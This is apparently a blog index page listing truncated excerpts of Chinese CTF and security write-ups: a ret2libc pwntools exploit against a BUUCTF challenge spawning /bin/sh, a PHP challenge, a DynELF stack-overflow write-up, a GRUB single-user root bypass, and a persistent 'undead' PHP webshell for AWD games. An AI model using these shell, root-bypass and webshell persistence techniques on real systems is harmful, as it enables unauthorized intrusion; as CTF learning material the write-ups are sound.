上一页 1 ··· 7 8 9 10 11 12 13 14 15 16 下一页
摘要: ret2libc 通过printf泄露read的函数地址计算libc的基址,ROP链构造system(‘/bin/sh’) from pwn import * r=remote('node3.buuoj.cn',26686) elf=ELF('./babyrop2') libc=ELF('./lib 阅读全文
posted @ 2020-02-07 21:17 高诺琪 阅读(1420) 评论(0) 推荐(0) 编辑
摘要: 题目源码如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r') "welcome to t 阅读全文
posted @ 2020-02-03 15:12 高诺琪 阅读(4535) 评论(0) 推荐(4) 编辑
摘要: 题目地址 本文参考 64位的程序,并且只有NX防护 用IDA可以看到主要的函数在sub_40063D,其中的参数从sub_40068E传入 那么a1就是v1,大小为0x40 a2就是200 题目存在read栈溢出漏洞,没有给libc,也没有直接利用的后门函数 但是有puts函数可以利用DynELF来 阅读全文
posted @ 2020-01-14 23:32 高诺琪 阅读(645) 评论(0) 推荐(0) 编辑
摘要: 打开虚拟机,在这个界面按下e 之后会进入这个界面,找到ro修改成 rw init=/sysroot/bin/sh 修改完之后用ctrl+X进入单用户模式,然后输入命令 chroot /sysroot 获得root权限 这样就可以修改里面的文件,或者修改root的密码 修改完重启虚拟机即可 阅读全文
posted @ 2019-12-25 22:19 高诺琪 阅读(919) 评论(0) 推荐(0) 编辑
摘要: 借鉴文章 不死马常用于AWD模式,用于权限维持,首先上传一个不死马,然后访问该页面,就会执行不死马,它会以进程的形式运行,不断的生成文件,即使被发现也不容易被删掉,同时注意上传的目录是否有权限 不死马 <?php set_time_limit(0); //PHP脚本限制了执行时间,set_time_ 阅读全文
posted @ 2019-12-17 23:55 高诺琪 阅读(2243) 评论(0) 推荐(0) 编辑
上一页 1 ··· 7 8 9 10 11 12 13 14 15 16 下一页